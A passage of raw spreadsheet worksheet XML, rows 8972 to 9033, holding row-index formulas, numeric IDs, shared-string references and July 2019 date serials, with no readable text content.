      <c r="G8972" t="s">
        <v>17621</v>
      </c>
    </row>
    <row r="8973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8973">
        <f t="shared" si="140"/>
        <v>8972</v>
      </c>
      <c r="B8973">
        <v>3972</v>
      </c>
      <c r="C8973" t="s">
        <v>9973</v>
      </c>
      <c r="D8973" s="1">
        <v>43674</v>
      </c>
      <c r="E8973" t="s">
        <v>17622</v>
      </c>
      <c r="F8973" t="s">
        <v>9975</v>
      </c>
      <c r="G8973" t="s">
        <v>17623</v>
      </c>
    </row>
    <row r="8974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8974">
        <f t="shared" si="140"/>
        <v>8973</v>
      </c>
      <c r="B8974">
        <v>3973</v>
      </c>
      <c r="C8974" t="s">
        <v>9973</v>
      </c>
      <c r="D8974" s="1">
        <v>43672</v>
      </c>
      <c r="E8974" t="s">
        <v>17624</v>
      </c>
      <c r="F8974" t="s">
        <v>9975</v>
      </c>
      <c r="G8974" t="s">
        <v>17625</v>
      </c>
    </row>
    <row r="8975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8975">
        <f t="shared" si="140"/>
        <v>8974</v>
      </c>
      <c r="B8975">
        <v>3974</v>
      </c>
      <c r="C8975" t="s">
        <v>9973</v>
      </c>
      <c r="D8975" s="1">
        <v>43670</v>
      </c>
      <c r="E8975" t="s">
        <v>17626</v>
      </c>
      <c r="F8975" t="s">
        <v>9975</v>
      </c>
      <c r="G8975" t="s">
        <v>17627</v>
      </c>
    </row>
    <row r="8976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8976">
        <f t="shared" si="140"/>
        <v>8975</v>
      </c>
      <c r="B8976">
        <v>3975</v>
      </c>
      <c r="C8976" t="s">
        <v>9973</v>
      </c>
      <c r="D8976" s="1">
        <v>43669</v>
      </c>
      <c r="E8976" t="s">
        <v>17628</v>
      </c>
      <c r="F8976" t="s">
        <v>9975</v>
      </c>
      <c r="G8976" t="s">
        <v>17629</v>
      </c>
    </row>
    <row r="8977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8977">
        <f t="shared" si="140"/>
        <v>8976</v>
      </c>
      <c r="B8977">
        <v>3976</v>
      </c>
      <c r="C8977" t="s">
        <v>9973</v>
      </c>
      <c r="D8977" s="1">
        <v>43670</v>
      </c>
      <c r="E8977" t="s">
        <v>17630</v>
      </c>
      <c r="F8977" t="s">
        <v>9975</v>
      </c>
      <c r="G8977" t="s">
        <v>17631</v>
      </c>
    </row>
    <row r="8978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8978">
        <f t="shared" si="140"/>
        <v>8977</v>
      </c>
      <c r="B8978">
        <v>3977</v>
      </c>
      <c r="C8978" t="s">
        <v>9973</v>
      </c>
      <c r="D8978" s="1">
        <v>43675</v>
      </c>
      <c r="E8978" t="s">
        <v>17632</v>
      </c>
      <c r="F8978" t="s">
        <v>9975</v>
      </c>
      <c r="G8978" t="s">
        <v>17633</v>
      </c>
    </row>
    <row r="8979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8979">
        <f t="shared" si="140"/>
        <v>8978</v>
      </c>
      <c r="B8979">
        <v>3978</v>
      </c>
      <c r="C8979" t="s">
        <v>9973</v>
      </c>
      <c r="D8979" s="1">
        <v>43669</v>
      </c>
      <c r="E8979" t="s">
        <v>17634</v>
      </c>
      <c r="F8979" t="s">
        <v>9975</v>
      </c>
      <c r="G8979" t="s">
        <v>17635</v>
      </c>
    </row>
    <row r="8980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8980">
        <f t="shared" si="140"/>
        <v>8979</v>
      </c>
      <c r="B8980">
        <v>3979</v>
      </c>
      <c r="C8980" t="s">
        <v>9973</v>
      </c>
      <c r="D8980" s="1">
        <v>43669</v>
      </c>
      <c r="E8980" t="s">
        <v>17636</v>
      </c>
      <c r="F8980" t="s">
        <v>9975</v>
      </c>
      <c r="G8980" t="s">
        <v>17637</v>
      </c>
    </row>
    <row r="8981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8981">
        <f t="shared" si="140"/>
        <v>8980</v>
      </c>
      <c r="B8981">
        <v>3980</v>
      </c>
      <c r="C8981" t="s">
        <v>9973</v>
      </c>
      <c r="D8981" s="1">
        <v>43669</v>
      </c>
      <c r="E8981" t="s">
        <v>17638</v>
      </c>
      <c r="F8981" t="s">
        <v>9975</v>
      </c>
      <c r="G8981" t="s">
        <v>17639</v>
      </c>
    </row>
    <row r="8982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8982">
        <f t="shared" si="140"/>
        <v>8981</v>
      </c>
      <c r="B8982">
        <v>3981</v>
      </c>
      <c r="C8982" t="s">
        <v>9973</v>
      </c>
      <c r="D8982" s="1">
        <v>43675</v>
      </c>
      <c r="E8982" t="s">
        <v>12912</v>
      </c>
      <c r="F8982" t="s">
        <v>10021</v>
      </c>
      <c r="G8982" t="s">
        <v>17640</v>
      </c>
    </row>
    <row r="8983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8983">
        <f t="shared" si="140"/>
        <v>8982</v>
      </c>
      <c r="B8983">
        <v>3982</v>
      </c>
      <c r="C8983" t="s">
        <v>9973</v>
      </c>
      <c r="D8983" s="1">
        <v>43669</v>
      </c>
      <c r="E8983" t="s">
        <v>17641</v>
      </c>
      <c r="F8983" t="s">
        <v>9975</v>
      </c>
      <c r="G8983" t="s">
        <v>17642</v>
      </c>
    </row>
    <row r="8984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8984">
        <f t="shared" si="140"/>
        <v>8983</v>
      </c>
      <c r="B8984">
        <v>3983</v>
      </c>
      <c r="C8984" t="s">
        <v>9973</v>
      </c>
      <c r="D8984" s="1">
        <v>43670</v>
      </c>
      <c r="E8984" t="s">
        <v>17643</v>
      </c>
      <c r="F8984" t="s">
        <v>9975</v>
      </c>
      <c r="G8984" t="s">
        <v>17644</v>
      </c>
    </row>
    <row r="8985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8985">
        <f t="shared" si="140"/>
        <v>8984</v>
      </c>
      <c r="B8985">
        <v>3984</v>
      </c>
      <c r="C8985" t="s">
        <v>9973</v>
      </c>
      <c r="D8985" s="1">
        <v>43672</v>
      </c>
      <c r="E8985" t="s">
        <v>17645</v>
      </c>
      <c r="F8985" t="s">
        <v>9975</v>
      </c>
      <c r="G8985" t="s">
        <v>17646</v>
      </c>
    </row>
    <row r="8986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8986">
        <f t="shared" si="140"/>
        <v>8985</v>
      </c>
      <c r="B8986">
        <v>3985</v>
      </c>
      <c r="C8986" t="s">
        <v>9973</v>
      </c>
      <c r="D8986" s="1">
        <v>43674</v>
      </c>
      <c r="E8986" t="s">
        <v>17647</v>
      </c>
      <c r="F8986" t="s">
        <v>9975</v>
      </c>
      <c r="G8986" t="s">
        <v>17648</v>
      </c>
    </row>
    <row r="8987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8987">
        <f t="shared" si="140"/>
        <v>8986</v>
      </c>
      <c r="B8987">
        <v>3986</v>
      </c>
      <c r="C8987" t="s">
        <v>9973</v>
      </c>
      <c r="D8987" s="1">
        <v>43671</v>
      </c>
      <c r="E8987" t="s">
        <v>17649</v>
      </c>
      <c r="F8987" t="s">
        <v>9975</v>
      </c>
      <c r="G8987" t="s">
        <v>17650</v>
      </c>
    </row>
    <row r="8988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8988">
        <f t="shared" si="140"/>
        <v>8987</v>
      </c>
      <c r="B8988">
        <v>3987</v>
      </c>
      <c r="C8988" t="s">
        <v>9973</v>
      </c>
      <c r="D8988" s="1">
        <v>43677</v>
      </c>
      <c r="E8988" t="s">
        <v>17651</v>
      </c>
      <c r="F8988" t="s">
        <v>9975</v>
      </c>
      <c r="G8988" t="s">
        <v>17652</v>
      </c>
    </row>
    <row r="8989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8989">
        <f t="shared" si="140"/>
        <v>8988</v>
      </c>
      <c r="B8989">
        <v>3988</v>
      </c>
      <c r="C8989" t="s">
        <v>9973</v>
      </c>
      <c r="D8989" s="1">
        <v>43668</v>
      </c>
      <c r="E8989" t="s">
        <v>17653</v>
      </c>
      <c r="F8989" t="s">
        <v>9975</v>
      </c>
      <c r="G8989" t="s">
        <v>17654</v>
      </c>
    </row>
    <row r="8990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8990">
        <f t="shared" si="140"/>
        <v>8989</v>
      </c>
      <c r="B8990">
        <v>3989</v>
      </c>
      <c r="C8990" t="s">
        <v>9973</v>
      </c>
      <c r="D8990" s="1">
        <v>43675</v>
      </c>
      <c r="E8990" t="s">
        <v>17655</v>
      </c>
      <c r="F8990" t="s">
        <v>9975</v>
      </c>
      <c r="G8990" t="s">
        <v>17656</v>
      </c>
    </row>
    <row r="8991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8991">
        <f t="shared" si="140"/>
        <v>8990</v>
      </c>
      <c r="B8991">
        <v>3990</v>
      </c>
      <c r="C8991" t="s">
        <v>9973</v>
      </c>
      <c r="D8991" s="1">
        <v>43673</v>
      </c>
      <c r="E8991" t="s">
        <v>17657</v>
      </c>
      <c r="F8991" t="s">
        <v>9975</v>
      </c>
      <c r="G8991" t="s">
        <v>17658</v>
      </c>
    </row>
    <row r="8992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8992">
        <f t="shared" si="140"/>
        <v>8991</v>
      </c>
      <c r="B8992">
        <v>3991</v>
      </c>
      <c r="C8992" t="s">
        <v>9973</v>
      </c>
      <c r="D8992" s="1">
        <v>43672</v>
      </c>
      <c r="E8992" t="s">
        <v>17659</v>
      </c>
      <c r="F8992" t="s">
        <v>9975</v>
      </c>
      <c r="G8992" t="s">
        <v>17660</v>
      </c>
    </row>
    <row r="8993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8993">
        <f t="shared" si="140"/>
        <v>8992</v>
      </c>
      <c r="B8993">
        <v>3992</v>
      </c>
      <c r="C8993" t="s">
        <v>9973</v>
      </c>
      <c r="D8993" s="1">
        <v>43672</v>
      </c>
      <c r="E8993" t="s">
        <v>17661</v>
      </c>
      <c r="F8993" t="s">
        <v>9975</v>
      </c>
      <c r="G8993" t="s">
        <v>17662</v>
      </c>
    </row>
    <row r="8994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8994">
        <f t="shared" si="140"/>
        <v>8993</v>
      </c>
      <c r="B8994">
        <v>3993</v>
      </c>
      <c r="C8994" t="s">
        <v>9973</v>
      </c>
      <c r="D8994" s="1">
        <v>43677</v>
      </c>
      <c r="E8994" t="s">
        <v>17663</v>
      </c>
      <c r="F8994" t="s">
        <v>9975</v>
      </c>
      <c r="G8994" t="s">
        <v>17664</v>
      </c>
    </row>
    <row r="8995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8995">
        <f t="shared" si="140"/>
        <v>8994</v>
      </c>
      <c r="B8995">
        <v>3994</v>
      </c>
      <c r="C8995" t="s">
        <v>9973</v>
      </c>
      <c r="D8995" s="1">
        <v>43670</v>
      </c>
      <c r="E8995" t="s">
        <v>17665</v>
      </c>
      <c r="F8995" t="s">
        <v>9975</v>
      </c>
      <c r="G8995" t="s">
        <v>17666</v>
      </c>
    </row>
    <row r="8996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8996">
        <f t="shared" si="140"/>
        <v>8995</v>
      </c>
      <c r="B8996">
        <v>3995</v>
      </c>
      <c r="C8996" t="s">
        <v>9973</v>
      </c>
      <c r="D8996" s="1">
        <v>43673</v>
      </c>
      <c r="E8996" t="s">
        <v>17667</v>
      </c>
      <c r="F8996" t="s">
        <v>9975</v>
      </c>
      <c r="G8996" t="s">
        <v>17668</v>
      </c>
    </row>
    <row r="8997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8997">
        <f t="shared" si="140"/>
        <v>8996</v>
      </c>
      <c r="B8997">
        <v>3996</v>
      </c>
      <c r="C8997" t="s">
        <v>9973</v>
      </c>
      <c r="D8997" s="1">
        <v>43675</v>
      </c>
      <c r="E8997" t="s">
        <v>17669</v>
      </c>
      <c r="F8997" t="s">
        <v>9975</v>
      </c>
      <c r="G8997" t="s">
        <v>17670</v>
      </c>
    </row>
    <row r="8998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8998">
        <f t="shared" si="140"/>
        <v>8997</v>
      </c>
      <c r="B8998">
        <v>3997</v>
      </c>
      <c r="C8998" t="s">
        <v>9973</v>
      </c>
      <c r="D8998" s="1">
        <v>43677</v>
      </c>
      <c r="E8998" t="s">
        <v>17671</v>
      </c>
      <c r="F8998" t="s">
        <v>9975</v>
      </c>
      <c r="G8998" t="s">
        <v>15924</v>
      </c>
    </row>
    <row r="8999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8999">
        <f t="shared" si="140"/>
        <v>8998</v>
      </c>
      <c r="B8999">
        <v>3998</v>
      </c>
      <c r="C8999" t="s">
        <v>9973</v>
      </c>
      <c r="D8999" s="1">
        <v>43671</v>
      </c>
      <c r="E8999" t="s">
        <v>17672</v>
      </c>
      <c r="F8999" t="s">
        <v>9975</v>
      </c>
      <c r="G8999" t="s">
        <v>17673</v>
      </c>
    </row>
    <row r="9000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9000">
        <f t="shared" si="140"/>
        <v>8999</v>
      </c>
      <c r="B9000">
        <v>3999</v>
      </c>
      <c r="C9000" t="s">
        <v>9973</v>
      </c>
      <c r="D9000" s="1">
        <v>43676</v>
      </c>
      <c r="E9000" t="s">
        <v>17674</v>
      </c>
      <c r="F9000" t="s">
        <v>9975</v>
      </c>
      <c r="G9000" t="s">
        <v>17675</v>
      </c>
    </row>
    <row r="9001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9001">
        <f t="shared" si="140"/>
        <v>9000</v>
      </c>
      <c r="B9001">
        <v>4000</v>
      </c>
      <c r="C9001" t="s">
        <v>9973</v>
      </c>
      <c r="D9001" s="1">
        <v>43671</v>
      </c>
      <c r="E9001" t="s">
        <v>17676</v>
      </c>
      <c r="F9001" t="s">
        <v>9975</v>
      </c>
      <c r="G9001" t="s">
        <v>17677</v>
      </c>
    </row>
    <row r="9002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9002">
        <f t="shared" si="140"/>
        <v>9001</v>
      </c>
      <c r="B9002">
        <v>4001</v>
      </c>
      <c r="C9002" t="s">
        <v>9973</v>
      </c>
      <c r="D9002" s="1">
        <v>43676</v>
      </c>
      <c r="E9002" t="s">
        <v>17678</v>
      </c>
      <c r="F9002" t="s">
        <v>9975</v>
      </c>
      <c r="G9002" t="s">
        <v>17679</v>
      </c>
    </row>
    <row r="9003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9003">
        <f t="shared" si="140"/>
        <v>9002</v>
      </c>
      <c r="B9003">
        <v>4002</v>
      </c>
      <c r="C9003" t="s">
        <v>9973</v>
      </c>
      <c r="D9003" s="1">
        <v>43675</v>
      </c>
      <c r="E9003" t="s">
        <v>17680</v>
      </c>
      <c r="F9003" t="s">
        <v>9975</v>
      </c>
      <c r="G9003" t="s">
        <v>17681</v>
      </c>
    </row>
    <row r="9004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9004">
        <f t="shared" si="140"/>
        <v>9003</v>
      </c>
      <c r="B9004">
        <v>4003</v>
      </c>
      <c r="C9004" t="s">
        <v>9973</v>
      </c>
      <c r="D9004" s="1">
        <v>43676</v>
      </c>
      <c r="E9004" t="s">
        <v>17682</v>
      </c>
      <c r="F9004" t="s">
        <v>10021</v>
      </c>
      <c r="G9004" t="s">
        <v>17683</v>
      </c>
    </row>
    <row r="9005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9005">
        <f t="shared" si="140"/>
        <v>9004</v>
      </c>
      <c r="B9005">
        <v>4004</v>
      </c>
      <c r="C9005" t="s">
        <v>9973</v>
      </c>
      <c r="D9005" s="1">
        <v>43672</v>
      </c>
      <c r="E9005" t="s">
        <v>17684</v>
      </c>
      <c r="F9005" t="s">
        <v>9975</v>
      </c>
      <c r="G9005" t="s">
        <v>17685</v>
      </c>
    </row>
    <row r="9006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9006">
        <f t="shared" si="140"/>
        <v>9005</v>
      </c>
      <c r="B9006">
        <v>4005</v>
      </c>
      <c r="C9006" t="s">
        <v>9973</v>
      </c>
      <c r="D9006" s="1">
        <v>43673</v>
      </c>
      <c r="E9006" t="s">
        <v>17686</v>
      </c>
      <c r="F9006" t="s">
        <v>9975</v>
      </c>
      <c r="G9006" t="s">
        <v>17687</v>
      </c>
    </row>
    <row r="9007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9007">
        <f t="shared" si="140"/>
        <v>9006</v>
      </c>
      <c r="B9007">
        <v>4006</v>
      </c>
      <c r="C9007" t="s">
        <v>9973</v>
      </c>
      <c r="D9007" s="1">
        <v>43675</v>
      </c>
      <c r="E9007" t="s">
        <v>17688</v>
      </c>
      <c r="F9007" t="s">
        <v>9975</v>
      </c>
      <c r="G9007" t="s">
        <v>17689</v>
      </c>
    </row>
    <row r="9008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9008">
        <f t="shared" si="140"/>
        <v>9007</v>
      </c>
      <c r="B9008">
        <v>4007</v>
      </c>
      <c r="C9008" t="s">
        <v>9973</v>
      </c>
      <c r="D9008" s="1">
        <v>43674</v>
      </c>
      <c r="E9008" t="s">
        <v>17690</v>
      </c>
      <c r="F9008" t="s">
        <v>9975</v>
      </c>
      <c r="G9008" t="s">
        <v>17691</v>
      </c>
    </row>
    <row r="9009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9009">
        <f t="shared" si="140"/>
        <v>9008</v>
      </c>
      <c r="B9009">
        <v>4008</v>
      </c>
      <c r="C9009" t="s">
        <v>9973</v>
      </c>
      <c r="D9009" s="1">
        <v>43676</v>
      </c>
      <c r="E9009" t="s">
        <v>17692</v>
      </c>
      <c r="F9009" t="s">
        <v>9975</v>
      </c>
      <c r="G9009" t="s">
        <v>17693</v>
      </c>
    </row>
    <row r="9010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9010">
        <f t="shared" si="140"/>
        <v>9009</v>
      </c>
      <c r="B9010">
        <v>4009</v>
      </c>
      <c r="C9010" t="s">
        <v>9973</v>
      </c>
      <c r="D9010" s="1">
        <v>43669</v>
      </c>
      <c r="E9010" t="s">
        <v>17694</v>
      </c>
      <c r="F9010" t="s">
        <v>9975</v>
      </c>
      <c r="G9010" t="s">
        <v>17695</v>
      </c>
    </row>
    <row r="9011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9011">
        <f t="shared" si="140"/>
        <v>9010</v>
      </c>
      <c r="B9011">
        <v>4010</v>
      </c>
      <c r="C9011" t="s">
        <v>9973</v>
      </c>
      <c r="D9011" s="1">
        <v>43669</v>
      </c>
      <c r="E9011" t="s">
        <v>17696</v>
      </c>
      <c r="F9011" t="s">
        <v>9975</v>
      </c>
      <c r="G9011" t="s">
        <v>17697</v>
      </c>
    </row>
    <row r="9012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9012">
        <f t="shared" si="140"/>
        <v>9011</v>
      </c>
      <c r="B9012">
        <v>4011</v>
      </c>
      <c r="C9012" t="s">
        <v>9973</v>
      </c>
      <c r="D9012" s="1">
        <v>43670</v>
      </c>
      <c r="E9012" t="s">
        <v>17698</v>
      </c>
      <c r="F9012" t="s">
        <v>9975</v>
      </c>
      <c r="G9012" t="s">
        <v>17699</v>
      </c>
    </row>
    <row r="9013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9013">
        <f t="shared" si="140"/>
        <v>9012</v>
      </c>
      <c r="B9013">
        <v>4012</v>
      </c>
      <c r="C9013" t="s">
        <v>9973</v>
      </c>
      <c r="D9013" s="1">
        <v>43668</v>
      </c>
      <c r="E9013" t="s">
        <v>17700</v>
      </c>
      <c r="F9013" t="s">
        <v>9975</v>
      </c>
      <c r="G9013" t="s">
        <v>17701</v>
      </c>
    </row>
    <row r="9014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9014">
        <f t="shared" si="140"/>
        <v>9013</v>
      </c>
      <c r="B9014">
        <v>4013</v>
      </c>
      <c r="C9014" t="s">
        <v>9973</v>
      </c>
      <c r="D9014" s="1">
        <v>43670</v>
      </c>
      <c r="E9014" t="s">
        <v>17702</v>
      </c>
      <c r="F9014" t="s">
        <v>9975</v>
      </c>
      <c r="G9014" t="s">
        <v>17703</v>
      </c>
    </row>
    <row r="9015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9015">
        <f t="shared" si="140"/>
        <v>9014</v>
      </c>
      <c r="B9015">
        <v>4014</v>
      </c>
      <c r="C9015" t="s">
        <v>9973</v>
      </c>
      <c r="D9015" s="1">
        <v>43672</v>
      </c>
      <c r="E9015" t="s">
        <v>17704</v>
      </c>
      <c r="F9015" t="s">
        <v>9975</v>
      </c>
      <c r="G9015" t="s">
        <v>17705</v>
      </c>
    </row>
    <row r="9016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9016">
        <f t="shared" si="140"/>
        <v>9015</v>
      </c>
      <c r="B9016">
        <v>4015</v>
      </c>
      <c r="C9016" t="s">
        <v>9973</v>
      </c>
      <c r="D9016" s="1">
        <v>43674</v>
      </c>
      <c r="E9016" t="s">
        <v>17706</v>
      </c>
      <c r="F9016" t="s">
        <v>9975</v>
      </c>
      <c r="G9016" t="s">
        <v>17707</v>
      </c>
    </row>
    <row r="9017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9017">
        <f t="shared" si="140"/>
        <v>9016</v>
      </c>
      <c r="B9017">
        <v>4016</v>
      </c>
      <c r="C9017" t="s">
        <v>9973</v>
      </c>
      <c r="D9017" s="1">
        <v>43672</v>
      </c>
      <c r="E9017" t="s">
        <v>17708</v>
      </c>
      <c r="F9017" t="s">
        <v>9975</v>
      </c>
      <c r="G9017" t="s">
        <v>17709</v>
      </c>
    </row>
    <row r="9018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9018">
        <f t="shared" si="140"/>
        <v>9017</v>
      </c>
      <c r="B9018">
        <v>4017</v>
      </c>
      <c r="C9018" t="s">
        <v>9973</v>
      </c>
      <c r="D9018" s="1">
        <v>43675</v>
      </c>
      <c r="E9018" t="s">
        <v>17710</v>
      </c>
      <c r="F9018" t="s">
        <v>9975</v>
      </c>
      <c r="G9018" t="s">
        <v>17711</v>
      </c>
    </row>
    <row r="9019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9019">
        <f t="shared" si="140"/>
        <v>9018</v>
      </c>
      <c r="B9019">
        <v>4018</v>
      </c>
      <c r="C9019" t="s">
        <v>9973</v>
      </c>
      <c r="D9019" s="1">
        <v>43671</v>
      </c>
      <c r="E9019" t="s">
        <v>17712</v>
      </c>
      <c r="F9019" t="s">
        <v>9975</v>
      </c>
      <c r="G9019" t="s">
        <v>17713</v>
      </c>
    </row>
    <row r="9020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9020">
        <f t="shared" si="140"/>
        <v>9019</v>
      </c>
      <c r="B9020">
        <v>4019</v>
      </c>
      <c r="C9020" t="s">
        <v>9973</v>
      </c>
      <c r="D9020" s="1">
        <v>43671</v>
      </c>
      <c r="E9020" t="s">
        <v>17714</v>
      </c>
      <c r="F9020" t="s">
        <v>9975</v>
      </c>
      <c r="G9020" t="s">
        <v>17715</v>
      </c>
    </row>
    <row r="9021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9021">
        <f t="shared" si="140"/>
        <v>9020</v>
      </c>
      <c r="B9021">
        <v>4020</v>
      </c>
      <c r="C9021" t="s">
        <v>9973</v>
      </c>
      <c r="D9021" s="1">
        <v>43673</v>
      </c>
      <c r="E9021" t="s">
        <v>17716</v>
      </c>
      <c r="F9021" t="s">
        <v>9975</v>
      </c>
      <c r="G9021" t="s">
        <v>17717</v>
      </c>
    </row>
    <row r="9022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9022">
        <f t="shared" si="140"/>
        <v>9021</v>
      </c>
      <c r="B9022">
        <v>4021</v>
      </c>
      <c r="C9022" t="s">
        <v>9973</v>
      </c>
      <c r="D9022" s="1">
        <v>43676</v>
      </c>
      <c r="E9022" t="s">
        <v>17718</v>
      </c>
      <c r="F9022" t="s">
        <v>9975</v>
      </c>
      <c r="G9022" t="s">
        <v>17719</v>
      </c>
    </row>
    <row r="9023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9023">
        <f t="shared" si="140"/>
        <v>9022</v>
      </c>
      <c r="B9023">
        <v>4022</v>
      </c>
      <c r="C9023" t="s">
        <v>9973</v>
      </c>
      <c r="D9023" s="1">
        <v>43670</v>
      </c>
      <c r="E9023" t="s">
        <v>17720</v>
      </c>
      <c r="F9023" t="s">
        <v>9975</v>
      </c>
      <c r="G9023" t="s">
        <v>17721</v>
      </c>
    </row>
    <row r="9024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9024">
        <f t="shared" si="140"/>
        <v>9023</v>
      </c>
      <c r="B9024">
        <v>4023</v>
      </c>
      <c r="C9024" t="s">
        <v>9973</v>
      </c>
      <c r="D9024" s="1">
        <v>43674</v>
      </c>
      <c r="E9024" t="s">
        <v>17722</v>
      </c>
      <c r="F9024" t="s">
        <v>9975</v>
      </c>
      <c r="G9024" t="s">
        <v>17723</v>
      </c>
    </row>
    <row r="9025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9025">
        <f t="shared" si="140"/>
        <v>9024</v>
      </c>
      <c r="B9025">
        <v>4024</v>
      </c>
      <c r="C9025" t="s">
        <v>9973</v>
      </c>
      <c r="D9025" s="1">
        <v>43669</v>
      </c>
      <c r="E9025" t="s">
        <v>17724</v>
      </c>
      <c r="F9025" t="s">
        <v>9975</v>
      </c>
      <c r="G9025" t="s">
        <v>17725</v>
      </c>
    </row>
    <row r="9026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9026">
        <f t="shared" si="140"/>
        <v>9025</v>
      </c>
      <c r="B9026">
        <v>4025</v>
      </c>
      <c r="C9026" t="s">
        <v>9973</v>
      </c>
      <c r="D9026" s="1">
        <v>43670</v>
      </c>
      <c r="E9026" t="s">
        <v>17726</v>
      </c>
      <c r="F9026" t="s">
        <v>9975</v>
      </c>
      <c r="G9026" t="s">
        <v>17727</v>
      </c>
    </row>
    <row r="9027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9027">
        <f t="shared" ref="A9027:A9090" si="141">+ROW(A9026)</f>
        <v>9026</v>
      </c>
      <c r="B9027">
        <v>4026</v>
      </c>
      <c r="C9027" t="s">
        <v>9973</v>
      </c>
      <c r="D9027" s="1">
        <v>43671</v>
      </c>
      <c r="E9027" t="s">
        <v>17728</v>
      </c>
      <c r="F9027" t="s">
        <v>9975</v>
      </c>
      <c r="G9027" t="s">
        <v>17729</v>
      </c>
    </row>
    <row r="9028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9028">
        <f t="shared" si="141"/>
        <v>9027</v>
      </c>
      <c r="B9028">
        <v>4027</v>
      </c>
      <c r="C9028" t="s">
        <v>9973</v>
      </c>
      <c r="D9028" s="1">
        <v>43673</v>
      </c>
      <c r="E9028" t="s">
        <v>17730</v>
      </c>
      <c r="F9028" t="s">
        <v>9975</v>
      </c>
      <c r="G9028" t="s">
        <v>17731</v>
      </c>
    </row>
    <row r="9029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9029">
        <f t="shared" si="141"/>
        <v>9028</v>
      </c>
      <c r="B9029">
        <v>4028</v>
      </c>
      <c r="C9029" t="s">
        <v>9973</v>
      </c>
      <c r="D9029" s="1">
        <v>43675</v>
      </c>
      <c r="E9029" t="s">
        <v>17732</v>
      </c>
      <c r="F9029" t="s">
        <v>9975</v>
      </c>
      <c r="G9029" t="s">
        <v>17733</v>
      </c>
    </row>
    <row r="9030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9030">
        <f t="shared" si="141"/>
        <v>9029</v>
      </c>
      <c r="B9030">
        <v>4029</v>
      </c>
      <c r="C9030" t="s">
        <v>9973</v>
      </c>
      <c r="D9030" s="1">
        <v>43669</v>
      </c>
      <c r="E9030" t="s">
        <v>17734</v>
      </c>
      <c r="F9030" t="s">
        <v>9975</v>
      </c>
      <c r="G9030" t="s">
        <v>17735</v>
      </c>
    </row>
    <row r="9031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9031">
        <f t="shared" si="141"/>
        <v>9030</v>
      </c>
      <c r="B9031">
        <v>4030</v>
      </c>
      <c r="C9031" t="s">
        <v>9973</v>
      </c>
      <c r="D9031" s="1">
        <v>43676</v>
      </c>
      <c r="E9031" t="s">
        <v>17736</v>
      </c>
      <c r="F9031" t="s">
        <v>9975</v>
      </c>
      <c r="G9031" t="s">
        <v>17737</v>
      </c>
    </row>
    <row r="9032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9032">
        <f t="shared" si="141"/>
        <v>9031</v>
      </c>
      <c r="B9032">
        <v>4031</v>
      </c>
      <c r="C9032" t="s">
        <v>9973</v>
      </c>
      <c r="D9032" s="1">
        <v>43669</v>
      </c>
      <c r="E9032" t="s">
        <v>17738</v>
      </c>
      <c r="F9032" t="s">
        <v>9975</v>
      </c>
      <c r="G9032" t="s">
        <v>17739</v>
      </c>
    </row>
    <row r="9033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9033">
        <f t="shared" si="141"/>
        <v>9032</v>
      </c>
      <c r="B9033">
        <v>4032</v>
      </c>
      <c r="C9033" t="s">
        <v>9973</v>
      </c>
      <c r="D9033" s="1">
        <v>43669</v>
      </c>
      <c r="E9033" t="s">
        <v>17740</v>
      </c>
